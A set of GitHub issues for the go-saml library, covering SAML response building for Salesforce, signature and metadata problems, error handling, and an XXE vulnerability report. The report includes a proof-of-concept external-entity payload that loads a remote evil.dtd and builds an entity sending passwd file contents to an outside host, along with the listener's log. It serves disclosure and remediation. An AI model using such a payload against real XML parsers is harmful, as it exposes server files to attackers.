In our project, we have to enable SSO in which the service provider will be Salesforce and Identity Provider will be the Golang code. Golang code will first verify the user then it will generate a SAML response to allow a user to login to Salesforce.
I am new to Golang and following Creating a SAML Response (if acting as an IdP) of this library. So, far I am able to create a SAML response using it but facing some challenges in customizing it as per requirement.

1. The first challenge I was facing is to add AudienceRestriction in the Conditions block as below:-

<saml:Conditions NotBefore="2020-03-15T16:33:16.23103491Z" NotOnOrAfter="2020-03-15T16:43:16.23104017Z">
saml:AudienceRestriction
saml:Audiencehttps://saml.salesforce.com</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>

I have tried to add it like below in the code, but it seems Conditions is not defined in authnResponse object.

authnResponse := saml.NewSignedResponse()
authnResponse.Conditions.AudienceRestrictions = "https://saml.salesforce.com"

I don't find any way to add the above block in the Conditions block which is mandatory for Salesforce. Please suggest me some way to do so.

2. Even after manually adding the above block in the SAML response, I am getting the below error while validating the SAML response using the Salesforce SAML validator

Validating the Signature...
Is the response signed? true
Is the assertion signed? false
The reference in the response signature is valid
Is the correct certificate supplied in the keyinfo? true
Signature or certificate problems
The signature in the response is not valid

I have no idea why I am getting Signature Invalid error. Please let me know if you have any suggestions for me.

3. I also have to add AuthnStatement below the Conditions block as below:-

<saml:AuthnStatement AuthnInstant="2020-03-01T11:28:31.396Z">
saml:AuthnContext saml:AuthnContextClassRefurn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>

In case you want to check my Golang code - https://play.golang.org/p/U9dXZblTHG1

currently the xmlsec1 binary is invoked for every signature create and verification.
for production code this should be replaced by a native go library or a by using the C library.

Anyone know if go-saml vulnerable to the recently discovered bypass vulns?

https://www.kb.cert.org/vuls/id/475445
https://www.bleepingcomputer.com/news/security/saml-vulnerability-lets-attackers-log-in-as-other-users/

CVE-2017-11427

#21 currently open for this, the xmlsec1 command also needs to be modified - I personally can do this just thought it might get more movement if it were being tracked somewhere.

The generated metadata includes this clause:

 <md:Extensions xmlns:alg="urn:oasis:names:tc:SAML:metadata:algsupport" xmlns:mdattr="urn:oasis:names:tc:SAML:metadata:attribute" xmlns:mdrpi="urn:oasis:names:tc:SAML:metadata:rpi">
        <EntityAttributes></EntityAttributes>
    </md:Extensions>

This is flagged as invalid according to the XSD schema when validated using https://www.samltool.com/validate_xml.php

In addition, https://www.testshib.org/ refuses the file as invalid.

If I delete the entire <md:Extensions> element from the generated metadata, the file then validates and is also accepted by testshib.org. Since the element doesn't seem to contain any actual information, I'm guessing it isn't needed.

It appears that there's a new variable in GetAuthnRequestURL called state which refers to the Relay State of the request. However, in the usage documentation in the README, the variable is not accounted for. I would add the usage myself, but I'm unsure of the purpose of the parameter.

Right now the settings config and init require a local path to the file of the IDP meta data. This is not desirable since many multi tenant programs would load this config dynamically from db or have it injected in test, or even just point at the live URL from IDP to get meta data each time. As the library stands today must download this xml, save it locally (in cloud serverless env its not ideal to rely on saving to local file system) to the get file path to just pass to this library....

An example implementation would be great.

Description

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

Whenever xmlsec verifies, encrypt, decrypt an XML document the parse by default reads external entities resulting on an XXE Vulnerability.

The vulnerable code
xmlsec.go

https://github.com/RobotsAndPencils/go-saml/blob/master/xmlsec.go#L51

    // fmt.Println("xmlsec1", "--sign", "--privkey-pem", privateKeyPath,
    //  "--id-attr:ID", id,
    //  "--output", samlXmlsecOutput.Name(), samlXmlsecInput.Name())
    output, err := exec.Command("xmlsec1", "--sign", "--privkey-pem", privateKeyPath,
        "--id-attr:ID", id,
        "--output", samlXmlsecOutput.Name(), samlXmlsecInput.Name()).CombinedOutput()
    if err != nil {
        return "", errors.New(err.Error() + " : " + string(output))
    }

https://github.com/RobotsAndPencils/go-saml/blob/master/xmlsec.go#L92

    defer deleteTempFile(samlXmlsecInput.Name())

    //fmt.Println("xmlsec1", "--verify", "--pubkey-cert-pem", publicCertPath, "--id-attr:ID", id, samlXmlsecInput.Name())
    _, err = exec.Command("xmlsec1", "--verify", "--pubkey-cert-pem", publicCertPath, "--id-attr:ID", id, samlXmlsecInput.Name()).CombinedOutput()
    if err != nil {
        return errors.New("error verifing signature: " + err.Error())
    }
    return nil

Proof of Concept of xmlsec

$ cat input.xml 
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote;]>
Running a fake command to test:

matt at バトー in /tmp
$ xmlsec1 --verify --output /tmp/output.xml /tmp/input.xml 
http://192.168.3.2/evil.dtd:1: parser warning : not validating will not read content for PE entity data
passwd"><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://192.168.3.2/?%data;'>"
                                                                               ^
/tmp/input.xml:2: parser error : Start tag expected, '<' not found

^
Error: failed to parse xml file "/tmp/input.xml"
Error: failed to load document "/tmp/input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "/tmp/input.xml"

Listener:

❯❯❯ ruby server_only.rb 
Puma 2.14.0 starting...
* Min threads: 0, max threads: 16
* Environment: development
* Listening on tcp://192.168.3.1:80
== Sinatra (v1.4.6) has taken the stage on 80 for development with backup from Puma
The Server is Vulnerable | IP 192.168.3.2 | Path /evil.dtd
The Server is Vulnerable | IP 192.168.3.2 | Path /evil.dtd
The Server is Vulnerable | IP 192.168.3.2 | Path /evil.dtd
Note: The same results were found as a result of trying to encrypt or decyrpt content.

Recommendations

Even though the vulnerability is not directly responsible to go-saml. It is my recommendation that the go-saml library be more proactive and pre-filters any external DTDs by not allowing any of those during the marshall/unmarshall, instead of using the originalString at the time of signed/verify the SAML XML string using the vulnerable version of xmlsec/libxml2 libraries until the time the vulnerability can be correctly patched by itself.

For more information refer to:

• libxml2 XXE (https://bugzilla.gnome.org/show_bug.cgi?id=772726)
• xmlsec XXE (lsh123/xmlsec#43)
• https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
• https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet

Doing this...
authnRequest := sp.GetAuthnRequest()
b64XML, err := authnRequest.EncodedSignedString(sp.PrivateKeyPath)

getting this error
EncodedSignedString, error=&{%!e(string=exec: "xmlsec1": executable file not found in $PATH : )}","sta

the file exists and has a valid private key content in it....any ideas?

Seems this code will panic and crash program if it has errors, like loading the IDP metad file during sp settings init. Should just use errors Ideally as this is lib included in part of larger program, dont ever want a panic.

An SP doesn't necessarily need to sign the SAML requests.

It is possible that attributes will have multiple values. Currently the model will only keep one of the attribute values and drop the rest. Started looking at it and it might be tricky to do while maintaining backward compatibility without being confusing.

For IDP initiated workflow to just generate a SAMLResponse to send to an SP, seems this library can create the response, but any example how to configure and generate the metadata as an IDP? supported?